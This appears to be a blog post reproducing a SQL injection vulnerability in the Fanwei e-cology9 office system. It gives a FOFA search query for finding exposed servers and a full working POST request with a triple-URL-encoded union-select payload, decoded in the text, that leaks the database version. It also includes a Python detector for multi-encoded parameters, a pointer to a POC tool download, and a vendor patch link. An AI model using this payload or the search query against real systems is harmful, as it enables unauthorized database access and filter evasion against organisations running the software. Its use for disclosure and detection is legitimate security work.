Fanwei OA e-cology9 SQL injection vulnerability

Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.

1. Introduction to Fanwei e-cology9

This article was first published on the Nanfeng Vulnerability Reproduction Library official account

The Fanwei e-cology9 collaborative office system is an OA system based on JSP and a SQL Server database. It includes knowledge document management, human resource management, customer relationship management, project management, financial management, workflow management, a data center, and other modules. Its aim is to create a collaborative and efficient enterprise management environment: it breaks down the barriers between enterprise resources such as personnel, finance, materials, information and processes, and integrates them, together with other partners, on a unified platform, turning the enterprise into an electronic organization with internal and external collaboration.

2. Vulnerability description

Fanwei e-cology9 contains a SQL injection vulnerability that attackers can exploit to obtain sensitive database information.

CVE ID:
CNNVD ID:
CNVD ID: CNVD-2023-12632

3. Affected versions

Fanwei e-cology V9 < 10.56

4. FOFA query statement

app="Panwei-Collaborative Business System"

5. Vulnerability reproduction

Vulnerable URL: http://127.0.0.1/mobile/plugin/browser.jsp
Request packet:

POST /mobile/plugin/browser.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Connection: Keep-Alive
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 649

isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537

The decoded value of the keyword parameter is:

a' union select 1,''+(SELECT @@VERSION)+'

The value sent in the request is obtained by URL-encoding this string three times.

The database version is disclosed through the injection vulnerability.
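For detection, the relevant property of the request above is that the keyword value only becomes readable after three rounds of URL decoding, so a filter that inspects the raw or once-decoded body sees nothing but percent-escapes. The following is an added example, not part of the original article or the vendor's patch: it decodes each form parameter until it stops changing and reports any that needed more than one round. The function names, the round cap and the token pattern are assumptions chosen for illustration; the sample bodies are constructed.

```python
import re
from urllib.parse import unquote

TARGET_PATH = "/mobile/plugin/browser.jsp"   # endpoint named in the article
MAX_ROUNDS = 5                               # assumption: cap on decoding passes
# Illustrative token pattern, not an exhaustive SQL injection signature.
SQL_HINT = re.compile(r"'|\bunion\b|\bselect\b|@@", re.IGNORECASE)

def decode_fully(value):
    """URL-decode until the value stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < MAX_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds

def inspect_request(path, body):
    """Return (name, rounds, decoded, has_sql_tokens) for every form
    parameter that needed more than one decoding round."""
    if path.split("?", 1)[0] != TARGET_PATH:
        return []
    findings = []
    for pair in body.split("&"):
        # Split by hand: a form parser would already consume one round.
        name, _, raw = pair.partition("=")
        text, rounds = decode_fully(raw)
        if rounds >= 2:   # ordinary clients encode a form value once
            findings.append((name, rounds, text, bool(SQL_HINT.search(text))))
    return findings

# Constructed sample bodies: a triple-encoded "a'" and a normal search term.
SAMPLE_SUSPECT = ("isDis=1&browserTypeId=269"
                  "&keyword=%2525%2536%2531%2525%2532%2537")
SAMPLE_BENIGN = "isDis=1&browserTypeId=269&keyword=zhang%20san"

if __name__ == "__main__":
    for body in (SAMPLE_SUSPECT, SAMPLE_BENIGN):
        print(inspect_request(TARGET_PATH, body))
```

Single-encoded injection attempts are left to ordinary input filtering; this check only covers the gap created by repeated encoding.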

6. POC & EXP

Follow the public account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 27 to get the POC tool download address:

7. Remediation

The vendor has released a patch. Fix: https://www.weaver.com.cn/cs/securityDownload.asp#

Origin blog.csdn.net/nnn2188185/article/details/130444992